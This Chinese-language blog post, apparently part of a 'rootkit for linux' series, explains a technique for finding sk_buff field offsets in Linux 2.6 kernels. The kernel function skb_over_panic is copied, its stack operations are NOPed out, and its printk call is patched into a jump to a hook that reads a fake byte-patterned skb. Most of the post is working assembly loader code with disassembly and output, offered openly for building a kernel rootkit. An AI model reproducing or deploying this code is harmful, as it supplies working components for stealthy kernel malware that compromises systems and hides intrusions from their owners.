rootkit for linux 8.大大杀器---“模拟法”获得字段偏移

今天发现了个方法，可以完美地获得skb各个字段的偏移，需要配合上篇文章讲的大杀器“xde反汇编器”。

暂时称这种方法为“模拟法”，网上应该有类似方法，但不知道叫什么名字。

 

以前，我们获得skb字段的偏移用的是手动波，在函数里找某个指令的特征码，这方法是很不靠谱的。在有了xde以后，我发现，这方法有时候还是不靠谱，例如一个运算需要0x40(%eax)，0x50(%ebx)，你咋知道哪个先取出来呢？取到哪里？所以，无论是手动波，还是自动波，针对某个指令的查找都是有些不靠谱的。

 

那咋办？

 

我们要把对象转为某个函数。看看这个函数。

1. void skb_over_panic(struct sk_buff *skb, int sz, void *here)
2. {
3.     printk(KERN_EMERG "skb_over_panic: text:%p len:%d put:%d head:%p "
4.                       "data:%p tail:%p end:%p dev:%s/n",
5.            here, skb->len, sz, skb->head, skb->data, skb->tail, skb->end,
6.            skb->dev ? skb->dev->name : "<NULL>");
7.     BUG();
8. }

看看，head, len, data, tail。。全部取了一次。但当初我为啥不选择这个函数来搜索？就是因为不知道它先取那个后取那个。但我们还是有解决办法的。

这个函数在 2.6.18 ~ 2.6.24 压根就没变过，还是在内核符号表里导出的，符合我们的先决条件。

关键的是，这个函数里只调用了一次call。（BUG() 被展开为 asm("ud2a; jmp .")）

如果我们把这个函数内容复制到我们的缓冲区中，然后把那个call printk改成jmp到我们自己的函数里，那不就等于“劫持”了它吗？在我们自己的函数里，就能得到skb各个字段的内容，但不是偏移。

那内容怎么转化成偏移呢？很简单，恰好skb的长度在0x100左右，这真是太好了，这样我们就能放一个特殊的skb在我们的缓冲区里，然后把它的第一个字节的内容设成0x00，第二个字节的内容设成0x01。。。

这样，在我们的“劫持函数”里面，我们就可以获得各个字段的偏移了！！

 

要考虑的细节问题是skb_over_panic对esp的操作。所以，我们要把skb_over_panic开头（一般对栈的操作都放在开头）那几句push xxx; subl $xxx, %esp给搞掉，全部弄成nop，然后把 call printk 改成 jmp fake_get_skb_offsets。在fake_get_skb_offsets这个“劫持函数”里，再 jmp 回主函数。不就搞定了吗？！

 

我们要达到的效果就是：

改变前：

 

 

 

 

1. push   %esi              
2. mov    %edx,%esi         
3. push   %ebx              
4. mov    %eax,%ebx         
5. sub    $0x24,%esp        
6. mov    $0xc0315823,%edx  
7. mov    0x14(%eax),%eax   
8. test   %eax,%eax         
9. je     0x17              
10. mov    %eax,%edx         
11. mov    0x88(%ebx),%eax   
12. mov    %edx,0x20(%esp)   
13. mov    %esi,0xc(%esp)    
14. mov    %ecx,0x4(%esp)    
15. mov    %eax,0x1c(%esp)   
16. mov    0x84(%ebx),%eax   
17. movl   $0xc032c660,(%esp)
18. mov    %eax,0x18(%esp)   
19. mov    0x90(%ebx),%eax   
20. mov    %eax,0x14(%esp)   
21. mov    0x8c(%ebx),%eax   
22. mov    %eax,0x10(%esp)   
23. mov    0x54(%ebx),%eax   
24. mov    %eax,0x8(%esp)    
25. call   0xffebb3b0       // call printk() 

 

改变后：

 

 

 

1. nop                      
2. mov    %edx,%esi         
3. nop                      
4. mov    %eax,%ebx         
5. nop                      
6. nop                      
7. nop                     // 把对栈的操作都弄成 nop 
8. mov    $0xc0315823,%edx  
9. mov    0x14(%eax),%eax   
10. test   %eax,%eax         
11. je     0x17              
12. mov    %eax,%edx         
13. mov    0x88(%ebx),%eax   
14. mov    %edx,0x20(%esp)   
15. mov    %esi,0xc(%esp)    
16. mov    %ecx,0x4(%esp)    
17. mov    %eax,0x1c(%esp)   
18. mov    0x84(%ebx),%eax   
19. movl   $0xc032c660,(%esp)
20. mov    %eax,0x18(%esp)   
21. mov    0x90(%ebx),%eax   
22. mov    %eax,0x14(%esp)   
23. mov    0x8c(%ebx),%eax   
24. mov    %eax,0x10(%esp)   
25. mov    0x54(%ebx),%eax   
26. mov    %eax,0x8(%esp)    
27. jmp   0x268            // jmp 到我们自己的“劫持函数”             

实现一下：

 

1.     /* find the offsets of skb */
3.     jmp 2f
5. #define addr_call 0x8
7. fake_skb_over_panic:
8. /* we will copy the true skb_over_panic here, and change
9.     'call printk(...)' to 'jmp fake_get_skb_offsets'
10. */
11.     .fill 0x100
13. struct_dism:
14.     .fill sizeof_dism
16. fake_struct_sk_buff:
17. /* the content of this struct is:
18.     00 01 02 03 ... 
19.     easy to locate offsets :)
20. */
21.     .fill 0x140
23. fake_get_skb_offsets:
24. /*
25.     void skb_over_panic(struct sk_buff *skb, int sz, void *here)
26.     {
27.         printk(KERN_EMERG "skb_over_panic: text:%p len:%d put:%d head:%p "
28.                           "data:%p tail:%p end:%p dev:%s/n",
29.                here, skb->len, sz, skb->head, skb->data, skb->tail, skb->end,
30.                skb->dev ? skb->dev->name : "<NULL>");
31.         BUG();
32.     }
34.     now, we want to fake printk. so:
35.     skb->len = 0x8(%esp)
36.     skb->head = 0x10(%esp)
37.     skb->data = 0x14(%esp)
38.     skb->tail = 0x18(%esp)
39.     skb->end = 0x1c(%esp)
40.     skb->dev = 0x20(%esp)
41. */  
43.     GET_ADDR(sk_buff.len, %eax)
44.     movl 0x8(%esp), %ebx
45.     andl $0xff, %ebx
46.     movl %ebx, (%eax)
47.     
48.     GET_ADDR(sk_buff.data, %eax)
49.     movl 0x14(%esp), %ebx
50.     andl $0xff, %ebx
51.     movl %ebx, (%eax)
52.     
53.     GET_ADDR(sk_buff.tail, %eax)
54.     movl 0x18(%esp), %ebx
55.     andl $0xff, %ebx
56.     movl %ebx, (%eax)
58.     GET_ADDR(sk_buff.end, %eax)
59.     movl 0x1c(%esp), %ebx
60.     andl $0xff, %ebx
61.     movl %ebx, (%eax)
63.     GET_ADDR(sk_buff.dev, %eax)
64.     movl 0x20(%esp), %ebx
65.     andl $0xff, %ebx
66.     movl %ebx, (%eax)
68.     jmp fake_get_skb_offsets_ret
71. 2:  GET_ADDR(fake_struct_sk_buff, %edi)
72.     xorl %ecx, %ecx
73. 1:  movb %cl, (%edi)
74.     incl %edi
75.     incl %ecx
76.     cmpl $0x100, %ecx
77.     jl 1b
78.     // fill fake sk_buff
80.     GET_STR("skb_over_panic", %eax)
81.     movl $14, %edx
82.     call ksym_lookup
83.     jz loader_out
84.     movl %eax, %esi
85.     GET_ADDR(fake_skb_over_panic, %edi)
86.     movl $0x100, %ecx
87.     cld; rep movsb
89.     GET_ADDR(fake_skb_over_panic, %eax)
90.     leal 0x100(%eax), %edi
91.     movl %eax, %esi
92.     movl $0, addr_call(%esp)
93. 1:  movl %esi, %eax
94.     GET_ADDR(struct_dism, %edx)
95.     call xde_dism
96.     testl %eax, %eax
97.     jz loader_out
98.     movl %eax, %ebp
99.     
100.     cmpb $0xe8, dism_opcode(%edx)
101.     jz 3f
102.     cmpb $0x83, dism_opcode(%edx)
103.     jz 6f
104.     movb dism_opcode(%edx), %al
105.     andb $0x50, %al
106.     cmpb $0x50, %al
107.     jnz 2f
108.     cmpl $1, dism_len(%edx)
109.     jz 7f
111. 2:  addl %ebp, %esi
112.     cmpl %edi, %esi
113.     jl 1b
114.     jmp 5f
115.     
116. 3:  // meet call printk(...
117.     cmpl $0, addr_call(%esp)
118.     jnz 2b
119.     movl %esi, addr_call(%esp)
121. #ifdef _DEBUG_
122.     movl %esi, 4(%esp)
123.     DPRINT("meet printk at %lx/n")
124. #endif
126.     jmp 2b
128. 6:  // meet sub $xx, %esp; fuck it !!; fill it with 'nop'
129.     movw $0x9090, (%esi)
130.     movb $0x90, 2(%esi)
131.     jmp 2b
133. 7:  // meet push xxx; fuck it too !!
134.     movb $0x90, (%esi)
135.     jmp 2b
137. 5:  
139. #ifdef _DEBUG_
140.     DPRINT("finish./n")
141. #endif
143.     GET_ADDR(fake_get_skb_offsets, %eax)
144.     movl addr_call(%esp), %ebx
145.     addl $5, %ebx
146.     subl %ebx, %eax
147.     movl %eax, -4(%ebx)
148.     movb $0xe9, -5(%ebx)
150.     subl $0x40, %esp
151.     GET_ADDR(fake_struct_sk_buff, %eax)
152.     jmp fake_skb_over_panic
154. fake_get_skb_offsets_ret:
155.     addl $0x40, %esp
157. #undef addr_call
159.     // get sk_buff.protocol
160.     GET_STR("skb_gso_segment", %eax)
161.     movl $15, %edx
162.     call ksym_lookup
163.     jz loader_out
164.     movw $0xb70f, 4(%esp)
165.     movl $0x100, %edx
166.     leal 4(%esp), %ecx
167.     movl $2, (%esp)
168.     call memmem
169.     jz loader_out
170.     movzbl 3(%eax), %eax
171.     GET_ADDR(sk_buff.protocol, %ebx)
172.     movl %eax, (%ebx)
174. #ifdef _DEBUG_
175.     GET_ADDR(sk_buff.len, %eax)
176.     movl (%eax), %eax
177.     movl %eax, 0x4(%esp)
179.     GET_ADDR(sk_buff.data, %eax)
180.     movl (%eax), %eax
181.     movl %eax, 0x8(%esp)
183.     GET_ADDR(sk_buff.tail, %eax)
184.     movl (%eax), %eax
185.     movl %eax, 0xc(%esp)
187.     GET_ADDR(sk_buff.end, %eax)
188.     movl (%eax), %eax
189.     movl %eax, 0x10(%esp)
191.     GET_ADDR(sk_buff.dev, %eax)
192.     movl (%eax), %eax
193.     movl %eax, 0x14(%esp)
195.     GET_ADDR(sk_buff.protocol, %eax)
196.     movl (%eax), %eax
197.     movl %eax, 0x18(%esp)
199.     DPRINT("<3>skb_buff len %lx, data %lx, tail %lx, end %lx, dev %lx, protocol %lx/n")
200. #endif

 

看看效果：

 

skb_buff len 54, data 90, tail 84, end 88, dev 14, protocol 6a

哈哈，成功了！

 

这方法不仅通用，而且非常靠谱！！